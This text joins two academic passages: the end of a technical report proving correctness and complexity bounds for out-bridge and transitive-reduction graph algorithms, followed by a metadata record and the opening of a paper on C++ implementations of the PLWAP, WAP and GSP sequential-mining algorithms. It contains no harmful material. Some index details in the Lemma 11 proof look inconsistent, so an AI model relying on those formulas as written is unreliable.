**Case 1:** \( z \) is a non-descendant of \( v \). Then \( z \) must be \( x \) and all vertices in \( p'' \) lie in \( G_k \). Let \( t \) be the root of the leaf chain of \( G_{k-1} \) to which \( z \) belongs. Then by step 2d of algorithm Outbridges, \( z \) is collapsed into \( t \) and hence the path in \( G_k \) consisting of the tree path to \( t \), followed by non-tree arc \((t,y)\), followed by path \( p'' \) is an active path to \( v \) in \( G_k \).
**Case 2:** \( z \) is a descendant of \( v \). Let \( b=(z,a) \) be the outgoing arc from \( z \) in \( p \), and let \( t' \) be the root of the leaf chain in \( G_{k-1} \) to which \( z \) belongs. Hence \( t' \) is a descendant of \( a \) and \( z \) is a proper descendant of \( t' \). Let \( p''' \) be the portion of \( p'' \) from \( a \) to \( v \). The path \( p''' \) is a path in \( G_k \) as well.
**Case 2a:** The vertex \( z \) is reachable from some non-descendant \( w \) of \( v \) in \( H_k \). Then an arc \((w,z)\) is introduced in step 2c of the algorithm. If \( w \) is in \( G_k \) then the path from \( t \) to \( w \) followed by arc \((w,a)\) followed by path \( p''' \) is an active path to \( v \) in \( G_k \). If \( w \) is in \( G_{k-1}-G_k \) then the analysis of Case 1 gives an active path to \( v \) in \( G_k \).
**Case 2b:** The vertex \( z \) is not reachable from any non-descendant of \( v \) in \( H_k \). Now consider \( p'' \). This is a path of the form \(<u_{1,1}, \ldots, u_{1,k_1}, v_{1,1,1}, \ldots, v_{1,k_1,1}, \ldots, u_{c,1}, \ldots, u_{c,k_c}, v_{c,1}, \ldots, v_{c,k_c}\>\), where the \( u_{i,j} \) are in \( G_{k-1}-G_k \) and the \( v_{i,j} \) are in \( G_k \), and if \( y \) is in \( G_k \) the initial sequence of \( u_{1,j} \)'s is empty. All of the \( u_{i,j} \) and \( v_{i,j} \) are descendants of \( v \). Each \( v_{i,1} \) is reachable from \( v_{i-1,k_i-1,1} \) in \( H_k \). Hence by step 2c of algorithm Outbridges, there is an arc from \( v_{i-1,k_i-1,1} \) to \( v_{i,1,1} \) in \( G_k \). The vertex \( v_{1,1} \) has an incoming arc from \( x \) in \( G_k \). The remaining arcs in \( p'' \) remain in \( G_k \). Hence there is a path from \( x \) to \( v \) in \( G_k \) that contains only vertices that are descendants of \( v \) in \( G_k \). Hence \( v \) is an active vertex in \( G_k \).
**Lemma 9:** Let \( e=(u,v) \) be a tree arc in \( G_{k,k>1} \) that is not an out-bridge in \( G_k \). Then \( e \) is not an out-bridge in \( G_{k-1} \).
**Proof:** Since \( e \) is not an out-bridge in \( G_k \) there is an active path \( p \) to \( v \) in \( G_k \). Consider any arc \( f=(x,y) \) in \( p \) that is not present in \( G_{k-1} \). If \( f \) was introduced in step 2c of algorithm Outbridges then there is a path from \( x \) to \( y \) in \( G_{k-1} \) that avoids all tree arcs in \( G_k \) and hence arc \( e \). If \( f \) was introduced in step 2d then there is a path from a descendant of \( x \) to \( y \) in \( G_{k-1} \) that avoids all tree arcs in \( G_k \). Hence there is a path from \( x \) to \( y \) in \( G_{k-1} \) that avoids arc \( e \). Hence from \( p \) we can obtain an active path \( p' \) to \( v \) in \( G_{k-1} \). Thus \( e \) is not an out-bridge in \( G_{k-1} \).
**Lemma 10:** Algorithm Outbridges correctly finds the out-bridges of $G$.
**Proof:** We show that at the start of each iteration of the repeat loop,
1) The out-bridges identified so far are exactly the out-bridges in the portion of the input graph $G$ that has been collapsed by the algorithm.
2) An arc $e$ in the current graph $G$ is an out-bridge in this graph if and only if it is an out-bridge in the original input graph.
The proof is by induction on $k$, the number of iterations of the repeat loop.
**Base:** $k=1$. The claim is vacuously true since no out-bridges have been identified and the input graph is the same as the current graph.
**Induction step:** Assume that the two claims are true until the start of iteration $k-1$ and now consider the start of iteration $k$. Claim 1) follows by the induction hypothesis and Lemma 7. Claim 2) follows by the induction hypothesis and Lemmas 8 and 9.[1]
Finally we note that algorithm Outbridges runs in $O(\log^2 n)$ with $O(n^3)$ processors on a CRCW PRAM. To see the processor and time bounds let us analyze the time complexity of each iteration of the repeat loop. By the previous analysis for the time complexity of algorithm Shrink, step 1 runs in $O(\log n)$ time with $O(n^2)$ processors on a CREW PRAM. Steps 2a, 2c, and 2d run in $O(\log n)$ time with $O(n^2)$ processors on a CREW PRAM. Step 2b runs in $O(\log n)$ time with $O(n^3)$ processors on a CRCW PRAM, and is the most expensive step in the repeat loop. Since the repeat loop is executed $O(\log n)$ times we obtain the stated time and processor bounds for algorithm Outbridges. On a CREW PRAM this algorithm runs in $O(\log^3 n)$ time with $M(n)$ processors.
Whether we use a CREW model or a CRCW model the time and processor bounds for finding a minimum weight branching using the algorithm in [Lo] dominate the time and processor bounds of algorithm Outbridges. Hence we can find redundant arcs within the time and processor bounds for minimum weight branchings, and thus the parallel transitive reduction algorithm runs in $O(\log^3 n)$ parallel time with $O(n^3)$ processors on a CRCW PRAM and in $O(\log^4 n)$ parallel time with the same processor bound on a CREW PRAM.
4. Sequential Algorithms for Transitive Reduction
As in section 3.2, let $r$ be a fixed root of a directed graph $G=(V,E)$, where $|V|=n$ and $|E|=m$. An algorithm for finding the in- and out-bridges is given in [Ta2]. This algorithm actually does more: It computes two forward branchings $T_1$ and $T_2$ having only the out-bridges in common, and two inverse branchings, $T_3$ and $T_4$, having only the in-bridges in common. This
algorithm can be implemented to run in linear time by using linear-time algorithms for computing nearest common ancestors [HT] and maintaining disjoint sets [GT].
Let $R$ be the set of redundant arcs, $I$ the set of in-bridges and $O$ the set of out-bridges. Hence $R=E-(I\cup O)$. The following algorithm finds a transitive reduction of $G$.
1. Pick a root vertex $r$ in $G$. Find a forward branching $B$ and an inverse branching $B'$ in $G$ and replace $G$ by $B\cup B'$.
2. Repeat
a) Construct two forward branchings $T_1$ and $T_2$ having only the out-bridges in common; identify the set of out-bridges as $O$.
b) Construct two inverse branchings $T_3$ and $T_4$ having only the in-bridges in common; identify the set of in-bridges as $I$.
c) Form the set of redundant arcs $R$ as $R=E-(O\cup I)$.
d) For $i=1,2,3,4$ form $S_i=T_i\cap R$.
e) Choose $T_i$ and $T_j$ such that $1\leq i \leq 2$, $3\leq j \leq 4$ and $S_i\cup S_j$ has minimum cardinality among $S_1\cup S_3, S_2\cup S_3, S_1\cup S_4, S_2\cup S_4$.
f) Replace $G$ by $T_i\cup T_j$.
until $R=\emptyset$.
The following claim establishes that the repeat loop is executed only $O(\log n)$ times.
**Lemma 11:** In step 2e of the algorithm the chosen $S_i$ and $S_j$ satisfy $|S_i\cup S_j|\leq (3/4)\cdot |R|$.
**Proof:** For $i=1,2,3,4$, let $F_i$ be the set of those arcs in $T_i$ that are not present in any other $T_j$, and let $P_{1,3}=(S_1\cap S_3)\cup F_1$, $P_{2,4}=(S_2\cap S_4)\cup F_2$, $P_{2,3}=(S_2\cap S_3)\cup F_3$ and $P_{1,4}=(S_1\cap S_4)\cup F_4$. Note that $P_{1,3}, P_{2,4}, P_{2,3}$ and $P_{1,4}$ are disjoint. Let one, say $P_{1,3}$, be the one of maximum cardinality. Then we must have $|P_{2,4}|+|P_{2,3}|+|P_{1,4}|\leq (3/4)\cdot |R|$. But $S_1\cup S_4\leq P_{2,4}\cup P_{2,3}\cup P_{1,4}$, which implies $|S_2\cup S_4|\leq (3/4)\cdot |R|$. Since we also have $S_1\cup S_3\leq P_{1,3}\cup P_{1,4}\cup P_{2,3}$, $S_1\cup S_4\leq P_{1,3}\cup P_{1,4}\cup P_{2,4}$ and $S_2\cup S_3\leq P_{2,3}\cup P_{2,4}\cup P_{1,3}$, we have $|S_1\cup S_3|\leq (3/4)\cdot |R|$ if $P_{2,4}$ is of maximum cardinality, $|S_1\cup S_4|\leq (3/4)\cdot |R|$ if $P_{2,3}$ is of maximum cardinality and $|S_2\cup S_3|\leq (3/4)\cdot |R|$ if $P_{1,4}$ is of maximum cardinality. Hence the chosen $S_i$ and $S_j$ in step 2e of the algorithm satisfy $|S_i\cup S_j|\leq (3/4)\cdot |R|$.
Step 1 of the algorithm takes $O(n+m)$ time and renders $G$ sparse ($O(n)$ arcs). As mentioned above, steps 2a and 2b can be implemented to run in $O(n)$ time using the algorithm in [Ta2], in conjunction with the algorithms in [HT] and [GT]. Each of steps 2c through 2f takes $O(n)$ time. Hence each execution of the repeat loop takes linear time. Since by Lemma 11 the repeat loop is
executed $O(\log n)$ times, the entire transitive reduction algorithm runs in $O(m+n\log n)$ time.
The algorithm of section 2 can also be implemented to run in $O(m+n\log n)$ time. This is because the minimum-weight branching algorithm of Edmonds [Ed2] can be implemented to run in linear time for 0-1 edge weights by using the algorithm in [GGST], with the heaps replaced by two buckets. As before, the redundant arcs can be found in linear time and hence each execution of the repeat loop takes linear time, leading to an $O(m+n\log n)$ time sequential algorithm for transitive reduction.
We have obtained sequential and parallel algorithms with similar complexities for analogous problems on undirected graphs, i.e., for finding a minimal bridge-connected spanning subgraph and a minimal biconnected spanning subgraph in an undirected graph, if such subgraphs exist. These results will appear in a companion paper.
We conclude by noting that it is conceivable that one (or both) of our sequential algorithms runs in linear time, since it is possible that the repeat loop needs to be executed only a constant number of times. We leave this question for further investigation. For the same reason it is possible that our parallel algorithms run faster than the stated time bounds by an $O(\log n)$ factor.
References
|
{"Source-Url": "https://www.cs.princeton.edu/techreports/1988/171.pdf", "len_cl100k_base": 11254, "olmocr-version": "0.1.53", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 19431, "total-output-tokens": 13539, "length": "2e13", "weborganizer": {"__label__adult": 0.00042891502380371094, "__label__art_design": 0.0004651546478271485, "__label__crime_law": 0.0007081031799316406, "__label__education_jobs": 0.0016145706176757812, "__label__entertainment": 0.0001443624496459961, "__label__fashion_beauty": 0.00025534629821777344, "__label__finance_business": 0.00042724609375, "__label__food_dining": 0.0005617141723632812, "__label__games": 0.0013570785522460938, "__label__hardware": 0.0033721923828125, "__label__health": 0.0013151168823242188, "__label__history": 0.0006389617919921875, "__label__home_hobbies": 0.0002918243408203125, "__label__industrial": 0.0009760856628417968, "__label__literature": 0.0003964900970458984, "__label__politics": 0.0004429817199707031, "__label__religion": 0.0008611679077148438, "__label__science_tech": 0.339111328125, "__label__social_life": 0.0001474618911743164, "__label__software": 0.011199951171875, "__label__software_dev": 0.63330078125, "__label__sports_fitness": 0.0004963874816894531, "__label__transportation": 0.001125335693359375, "__label__travel": 0.0003178119659423828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41180, 0.02562]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41180, 0.32223]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41180, 0.86448]], "google_gemma-3-12b-it_contains_pii": [[0, 151, false], [151, 1341, null], [1341, 4212, null], [4212, 7202, null], [7202, 9165, null], [9165, 11450, null], [11450, 13329, null], [13329, 15837, null], [15837, 18658, null], [18658, 21590, null], [21590, 23766, null], [23766, 27070, null], [27070, 31269, null], [31269, 33913, null], [33913, 36674, null], [36674, 38970, null], [38970, 41180, null]], "google_gemma-3-12b-it_is_public_document": [[0, 151, true], [151, 1341, null], [1341, 4212, null], [4212, 7202, null], [7202, 9165, null], [9165, 11450, null], [11450, 13329, null], [13329, 15837, null], [15837, 18658, null], [18658, 21590, null], [21590, 23766, null], [23766, 27070, null], [27070, 31269, null], [31269, 33913, null], [33913, 36674, null], [36674, 38970, null], [38970, 41180, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41180, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41180, null]], "pdf_page_numbers": [[0, 151, 1], [151, 1341, 2], [1341, 4212, 3], [4212, 7202, 4], [7202, 9165, 5], [9165, 11450, 6], [11450, 13329, 7], [13329, 15837, 8], [15837, 18658, 9], [18658, 21590, 10], [21590, 23766, 11], [23766, 27070, 12], [27070, 31269, 13], [31269, 33913, 14], [33913, 36674, 15], [36674, 38970, 16], [38970, 41180, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41180, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
f75f20c8ffd2cef239131ca1c0282c91d86050d7
|
ABSTRACT
PLWAP algorithm uses a preorder linked, position coded version of WAP tree and eliminates the need to recursively re-construct intermediate WAP trees during sequential mining as done by WAP tree technique. PLWAP produces significant reduction in response time achieved by the WAP algorithm and provides a position code mechanism for remembering the stored database, thus, eliminating the need to re-scan the original database as would be necessary for applications like those incrementally maintaining mined frequent patterns, performing stream or dynamic mining.
This paper presents open source code for both the PLWAP and WAP algorithms describing our implementations and experimental performance analysis of these two algorithms on synthetic data generated with IBM quest data generator. An implementation of the Apriori-like GSP sequential mining algorithm is also discussed and submitted.
Keywords
sequential patterns, web usage mining, WAP tree, pre-order linkage
1. INTRODUCTION
Basic association rule mining with the Apriori algorithm [1] finds database items (attributes) that occur most often together in database transactions. Thus, given a set of transactions (similar to database records), where each transaction is a set of items (attributes), an association rule is of the form $X \rightarrow Y$, where $X$ and $Y$ are sets of items and $X \cap Y = \emptyset$. Association rule mining algorithms generally first find all frequent patterns (itemsets) as all combinations of items or attributes with support (percentage occurrence in the entire database), greater or equal to a predefined minimum support. Then, in the second stage of mining, association rules are generated from each frequent pattern by defining all possible combinations of rule antecedent (head) and consequent (tail) from items composing the frequent patterns such that $antecedent \cap consequent = \emptyset$ and $antecedent \cup consequent = frequentpattern$. Then, only rules with confidence (number of transactions that contain the rule divided by the number of transactions containing the antecedent) greater than or equal to a pre-defined minimum confidence are retained as valuable, while the rest are pruned.
Sequential mining is an extension of basic association rule mining that accommodates ordered set of items or attributes, where the same item may be repeated in a sequence. While basic frequent pattern has a set of non-ordered items that have occurred together up to minimum support threshold, frequent sequential pattern has a sequence of ordered items that have occurred frequently in database transactions at least as often as the minimum support threshold. Thus, the measures of support and confidence used in association rule mining for deciding frequent itemsets are used in sequential mining for deciding frequent sequences. Just as an $i$-itemset contains $i$ items, an $n$-sequence contains $n$ ordered items (events). One application of sequential mining is web usage mining for finding the relationship among different web users’ accesses from web access logs [5], [11], [4] and [19]. Analysis of these access data can help for server performance enhancement and direct marketing in e-commerce as well as web personalization. Before applying sequential mining techniques to web log data, the web log transactions are pre-processed to group them into set of access sequences for each user identifier and to create web access sequences in the form of a transaction database. An example sequence database to be mined for frequent patterns used in [7], is given as Table 1.
<table>
<thead>
<tr>
<th>TID</th>
<th>Web access Sequences</th>
</tr>
</thead>
<tbody>
<tr>
<td>100</td>
<td>abdac</td>
</tr>
<tr>
<td>200</td>
<td>eaebcac</td>
</tr>
<tr>
<td>300</td>
<td>babfaec</td>
</tr>
<tr>
<td>400</td>
<td>babfaec</td>
</tr>
</tbody>
</table>
Access sequence $S' = e'_1 e'_2 \ldots e'_l$ is called a subsequence of an access sequence, $S = e_1 e_2 \ldots e_n$, and $S$ is a super-sequence of $S'$, denoted a $s S' \subseteq S$, if and only if for every event $e'_{j}$ in $S'$, there is an equal event $e_k$ in $S$, while the order that
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. To copy otherwise, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee.
WOODSTOCK '97 El Paso, Texas USA
Copyright 200X ACM X-XXXXX-XX-X/XX/XX ...$5.00.
events occurred in \( S \) is the same as the order of events in \( S' \). For example, with \( S' = ab \), \( S = babed \), we can say that \( S' \) is a subsequence of \( S \). We can also say that \( ac \) is a subsequence of \( S \), although there is \( b \) occurring between \( a \) and \( c \) in \( S \). In the sequence \( babed \), while \( bcd \) is a suffix subsequence of \( bab \), \( bab \) is a prefix subsequence of \( bcd \). Techniques for mining sequential patterns from web logs fall into Apriori or non-Apriori. The Apriori-like algorithms generate substantially huge sets of candidate patterns, especially for long sequential patterns [2], [3], [13], [14], [15]. WAP-tree mining [17] is a non-Apriori method which stores the web access patterns in a compact prefix tree, called WAP-tree, and avoids generating long lists of candidate sets to scan support for. However, WAP-tree algorithm has the drawback of recursively re-constructing numerous intermediate WAP-trees during mining in order to compute the frequent prefix subsequences of every suffix subsequence in a frequent sequence. This process is very time-consuming. The PLWAP algorithm [7] assigns a unique position code to each node of the WAP-tree, builds the WAP-tree head links in a pre-order fashion rather than in the order the nodes arrive as done by the WAP-tree algorithm. With the pre-order linked, position coded WAP-tree, the PLWAP algorithm is able to mine frequent sequences, starting with the prefix sequence without the need to recursively re-construct any intermediate WAP-trees. This approach results in tangible performance gain.
This paper presents discussions of the implementations of three key sequential mining algorithms used in experimental and performance justification of the PLWAP algorithm in [7]. The C++ implementations of three sequential mining algorithms, PLWAP [7], WAP [17], and GSP [3] are discussed.
### 1.1 Related Work
Work on mining sequential patterns in web log include the GSP [3], the PSP [13], the G sequence [18] and the graph traversal [15] algorithms. Agrawal and Srikant proposed three algorithms (Apriori, AprioriAll, AprioriSome) for sequential mining in [2]. The GSP (Generalized Sequential Patterns) [3] algorithm, which is 20 times faster than the Apriori algorithm was proposed. The GSP Algorithm makes multiple passes over data. The first pass determines the frequent 1-item patterns \( (L_1) \). Each subsequent pass starts with a seed set: the frequent sequences found in the previous pass \( (L_{k-1}) \). The seed set is used to generate new candidate sequences \( (C_k) \) by performing an Apriori gen join of \( L_{k-1} \) with \( (L_{k-1}) \). This join requires that every sequence \( s \) in the first \( L_{k-1} \) joins with other sequences \( s' \) in the second \( L_{k-1} \) if the last \( k-2 \) elements of \( s \) are the same as the first \( k-2 \) elements of \( s' \). For example, if frequent 3-sequence set \( L_3 \) has the following 6 sequences: \{\{(1,2)(3)\}, \{(1,2)(4)\}, \{(1)(3,4)\}, \{(1,3)(5)\}, \{(2,3)(4)\}, \{(2)(3)(5)\}\}, to obtain frequent 4-sequences, every frequent 3-sequence should join with the other 3-sequences that have the same first two elements as its last two elements. Sequence \( s=((1,2)(3)) \) joins with \( s'=((2)(3,4)) \) to generate a candidate 4-sequence \( (1,2)(3,4) \) since the last 2 elements of \( s, (2)(3) \), match with the first 2 elements of \( s' \). Similarly, \((1,2)(3)) \) joins with \((2)(3)(5)) \) to form \((1,2)(3)(5)) \). There are no more matching sequences to join in \( L_3 \). The join phase is followed with the pruning phase, when the candidate sequences with any of their contiguous \((k-1)\)-subsequences have a support count less than the minimum support, are dropped. The database is scanned for supports of the remaining candidate k-sequences to find frequent k-sequences \( (L_k) \), which become the seed for the next pass, candidate \((k+1)\)-sequences. The algorithm terminates when there are no frequent sequences at the end of a pass, or when there are no candidate sequences generated. The GSP algorithm uses a hash tree to reduce the number of candidates that are checked for support in the database.
The PSP (Prefix Tree For Sequential Patterns) [13] approach is much similar to the GSP algorithm [3], but stores the database on a more concise prefix tree with the leaf nodes carrying the supports of the sequences. At each step \( k \), the database is browsed for counting the support of current candidates. Then, the frequent sequence set, \( L_k \) is built.
The Graph Traversal mining [14], [15], uses a simple un-weighted graph to store web sequences and a graph traversal algorithm similar to Apriori algorithm to traverse the graph in order to compute the k-candidate set from the \((k-1)\)-candidate sequences without performing the Apriori-join. From the graph, if a candidate node is large, the adjacency list of the node is retrieved. The database still has to be scanned several times to compute the support of each candidate sequence although the number of computed candidate sequences is drastically reduced from that of the GSP algorithm. Other tree based approaches include [18] called G sequence mining. This algorithm uses wildcards, templates and construction of Aggregate tree for mining.
The FP-tree structure [9] first reorders and stores the frequent non-sequential database transaction items on a prefix tree, in descending order of their supports such that database transactions share common frequent prefix paths on the tree. Then, mining the tree is accomplished by recursive construction of conditional pattern bases for each frequent 1-item (in ordered list called f-list), starting with the lowest in the tree. Conditional FP-tree is constructed for each frequent conditional pattern having more than one path, while maximal mined frequent patterns consist of a concatenation of items on each single path with their suffix f-list item. FreeSpan [8] like the FP-tree method, lists the f-list in descending order of support, but it is developed for sequential pattern mining. PrefixSpan [16] is a pattern-growth method like FreeSpan, which reduces the search space for extending already discovered prefix pattern \( p \) by projecting a portion of the original database that contains all necessary data for mining sequential patterns grown from \( p \).
Web access pattern tree (WAP), is a non-Apriori algorithm, proposed by Pei et al. [17]. The WAP-tree stores the web log data in a prefix tree format similar to the frequent pattern tree [9] (FP-tree). WAP algorithm first scans the web log to compute all frequent individual events, then it constructs a WAP-tree over the set of frequent individual events of each transaction before it recursively mines the constructed WAP tree by building a conditional WAP tree for each conditional suffix frequent pattern found. The process of recursive mining of a conditional suffix WAP tree ends when it has only one branch or is empty.
An example application of the WAP-tree algorithm for finding all frequent events in the web log (constructing the WAP-tree and mining the access patterns from the WAP tree) is shown with the database in Table 2. Suppose the minimum support threshold is set at 75%, which means an access sequence, \( s \) should have a count of 3 out of 4 records in
our example, to be considered frequent. Constructing WAP-tree, entails first scanning database once, to obtain events that are frequent, \( a, b, c \). When constructing the WAP-tree, the non-frequent (like \( d, e, f \)) part of every sequence is discarded. Only the frequent sub-sequences shown in column three of Table 2 are used as input. With the frequent sequence in each transaction, the WAP-tree algorithm first stores the frequent items as header nodes for linking all nodes of their type in the WAP-tree in the order the nodes are inserted. When constructing the WAP-tree, a virtual root (Root) is first inserted. Then, each frequent sequence in the transaction is used to construct a branch from the Root to a leaf node of the tree. Each event in a sequence is inserted as a node with count 1 from Root if that node type does not yet exist, but the count of the node is increased by 1 if the node type already exists. Also, the head link for the inserted event is connected (in broken lines) to the newly inserted node from the last node of its type that was inserted or from the header node of its type if it is the very first node of that event type inserted. Once the frequent sequential data are stored on the complete WAP-tree (Figures 1), the tree is mined for frequent patterns starting with the lowest frequent event in the header list, in our example, starting from frequent event \( c \) as the following discussion shows. From the WAP-tree of Figure 1, it first computes prefix sequence of the base \( c \) or the conditional sequence base of \( c \) as: \( aba : 2; ab : 1; abca : 1; ab : -1; baba : 1; aba : 1; ab : -1 \)
Using these conditional sequences, a conditional WAP tree, WAP-tree\( c \), is built using the same method as shown in Figure 1. The re-construction of WAP trees that progressed as suffix sequences \( c, bc \) discovered frequent patterns found along this line \( c, bc \) and abc. The recursion continues with the suffix path \( c, ac \). The algorithm keeps running, finding the conditional sequence bases of \( bac, b, a \). Figure 2 shows the WAP trees for mining conditional pattern base \( c \). After mining the whole tree, discovered frequent pattern set is: \( \{c, aac, bac, abac, ac, abc, bc, b, ab, a, aa, ba, aba\} \).
Although WAP-tree algorithm scans the original database only twice and avoids the problem of generating explosive candidate sets as in Apriori-like algorithm, its main drawback is recursively re-conconstructing large numbers of intermediate WAP-trees and patterns during mining taking up computing resources.
Pre-Order linked WAP tree algorithm (PLWAP) [7], [10], is a version of the WAP tree algorithm that assigns unique binary position code to each tree node and performs the header node linkages prefix order fashion (root, left, right). Both the pre-order linkage and binary position codes enable the PLWAP to directly mine the sequential patterns from the initial WAP tree starting with prefix sequence, without re-constructing the intermediate WAP trees. To assign position codes to a PLWAP node, the root has null code, and the leftmost child of any parent node has a code that appends '1' to the position code of its parent, while the position code of any other node has '0' appended to the position code of its nearest left sibling. The PLWAP technique presents a much better performance than that achieved by the WAP-tree technique as shown in extensive performance.
1.2 Motivations and Contributions
PLWAP algorithm [7], a recently proposed sequential mining tool in the Journal of Data Mining and Knowledge Discovery has many attractive features that makes it suitable as a building block for many other sophisticated sequential data mining approaches like incremental mining [6], web classification and personalization. Features of the PLWAP algorithm can also be applied to non-sequential mining structures like the FP-tree. PLWAP and two other key sequential mining algorithms (WAP and GSP), have been implemented and tested thoroughly on publicly available data sets (http://www.almaden.ibm.com/software/quest/Resources/index.shtml) and with real data. Meaningful use and application of these efficient tools will greatly increase if their implementations are made publicly available.
This paper contributes by discussing our C++ implementations of three key sequential mining algorithms PLWAP, WAP and the GSP used in performance studies of work in [7].
1.3 Outline of the Paper
Section 2 discusses example mining with the Pre-Order Linked WAP-Tree (PLWAP) algorithm. Section 3 discusses the C++ implementations of the PLWAP, WAP and the GSP algorithms for sequential mining. Section 4 discusses experimental performance analysis, while section 5 presents conclusions and future work.
2. AN EXAMPLE SEQUENTIAL MINING WITH PLWAP ALGORITHM
Unlike the conditional search in WAP-tree mining, which is based on finding common suffix sequence first, the PLWAP technique finds the common prefix sequences first. The main idea is to find a frequent pattern by progressively finding its common frequent subsequences starting with the first frequent event in a frequent pattern. For example, if abcd is a frequent pattern to be discovered, the WAP algorithm progressively finds suffix sequences d, cd, bcd and abcd. The PLWAP tree, on the other hand, would find the prefix event a first, then, using the suffix trees of node a, it will find the next prefix subsequence ab and continuing with the suffix tree of b, it will find the next prefix subsequence abc and finally, abcd. Thus, the idea of PLWAP is to use the suffix trees of the last frequent event in an m-prefix sequence to recursively extend the subsequence to m+1 sequence by adding a frequent event that occurred in the suffix trees. Using the position codes of the nodes, the PLWAP is able to know the descendant and sibling nodes of oldest parent nodes on the suffix root set of a frequent header element being checked for appending to a prefix subsequence if it is frequent in the suffix root set under consideration. An element is frequent if the sum of the supports of the oldest parent nodes on all its suffix root sets is greater than or equal to the minimum support.
Assume we want to mine the web access database (wasd) of Table 2 for frequent sequences given a minimum support of 75% or 3 transactions. Constructing and mining the PLWAP tree goes through the following steps. (1) Scan WASD (column 2 of Table 2) once to find all frequent individual events, L as {a:4, b:4, c:4}. The events d:1, e:2, f:2 have supports less than the minimum support of 3 and (2) Scan WASD again, construct a PLWAP-tree over the set of individual frequent events (column 3 of Table 2, by inserting each sequence from root to leaf, labeling each node as (node event: count: position code). Then, after all events are inserted, traverse the tree pre-order way to connect the header link nodes. Figure 3 shows the completely constructed PLWAP tree with the pre-order linkages.
(3) Recursively mine the PLWAP-tree using common prefix pattern search: The algorithm starts to find the frequent sequence with the frequent 1-sequence in the set of frequent events(FE) {a, b, c}. For every frequent event in FE and the suffix trees of current conditional PLWAP-tree being mined, it follows the linkage of this event to find the first occurrence of this frequent event in every current suffix tree being mined, and adds the support count of all first occurrences of this frequent event in all its current suffix trees. If the count is greater than the minimum support threshold, then this event is appended (concatenated) to the last subsequence in the list of frequent sequences, F. The suffix trees of these first occurrence events in the previously mined conditional suffix PLWAP-trees are now in turn, used for mining the next event. To obtain this conditional PLWAP-tree, we only need to remember the roots of the current suffix trees, which are stored for next round mining. For example, the algorithm starts by mining the tree in Figure 4(a) for the first element in the header linkage list, a following the a link to find the first occurrences of a nodes in a:3:1 and a:1:101 of the suffix trees of the Root since this is the first time the whole tree is passed for mining a frequent 1-sequence. Now, the list of mined frequent patterns F is {a} since the count of event a in this current suffix trees is 4 (sum of a:3:1 and a:1:101 counts), and more than the minimum support of 3. The mining of frequent 2-sequences that start with event a would continue with the next suffix trees of a rooted at {b:3:11, b:1:1011} shown in Figure 4(b) as unshadowed nodes. The objective here is to find if 2-sequences aa, ab and ac are frequent using these suffix trees. In order to confirm aa frequent, we need to confirm event a frequent in the current suffix tree set, and similarly, to confirm ab frequent, we should again follow the b link to confirm event b frequent using this suffix tree set, same for ac. The process continues to obtain same frequent sequence set {a, aa, aac, ab, abac, abc, ac, b, ba, bac, bc, c} as the WAP-tree algorithm.
3. C++ IMPLEMENTATIONS OF THE THREE SEQUENTIAL MINING ALGORITHMS
Although, we lay more emphasis on the PLWAP algorithm developed in our lab, we also provide the source codes of the WAP and GSP algorithms used for performance analysis. The source codes are discussed under seven headings of (1) development and running environment, (2) input data format and files, (3) minimum support format, (4) output data format and files, (5) functions used in the program, (6) data structures used in the program and (7) additional information. All of the codes are documented with information on this section and more for code readability, maintainability and extendability. Each program is stored in a .cpp file and compiled with "g++ filename.cpp".
3.1 C++ Implementation of the PLWAP Sequential Mining Algorithm
This is the program of PLWAP algorithm which is based on the description in [7], C.I. Ezeife and Y. Lu. “Mining Web Log sequential Patterns with Position Coded Pre-Order Linked WAP-tree” in DMKD 2005. 1.DEVELOPMENT ENVIRONMENT: Although initial version is developed under the hardware/software environment specified below, the program runs on more powerful and faster multiprocessor UNIX environments as well. Initial environment is: (i)Hardware: Intel Celeron 400 PC, 64M Memory; (ii)Operating system: Windows 98; (iii)Development tool: Inprise(Borland) C++ Builder 6.0. The algorithm is developed under C++ Builder 6.0, but compiles and runs under any standard C++ development tool.
2. INPUT FILES AND FORMAT: Input file is test.data. For simplifying input process of the program, we assume that all input data have been preprocessed such that all events belonging to the same user id have been gathered together, and formed as a sequence and saved in a text file, called, “test.data”. The “test.data” file may be composed of hundreds of thousands of lines of sequences where each line represents a web access sequence for each user. Every line of the input data file (“test.data”) includes UserID, length of sequence and the sequence which are separated by tab spaces. An example input line is: 100 5 10 20 40 10 30. Here, 100 represents UserID, the length of sequence is 5, the sequence is 10,20,40,10,30.
3. MINIMUM SUPPORT FORMAT: The program also needs to accept a value between 0 and 1 as minimum support. The minimum support input is entered interactively by the user during the execution of the program when prompted. For a minimum support of 50%, user should type 0.5, and for minsupport of 5%, user should type .05, and so on.
4. OUTPUT FILES AND FORMAT: result_PLWAP.data: Once the program terminates, we can find the result frequent patterns in a file named “result_PLWAP.data”. It may contain lines of patterns, each representing a frequent pattern.
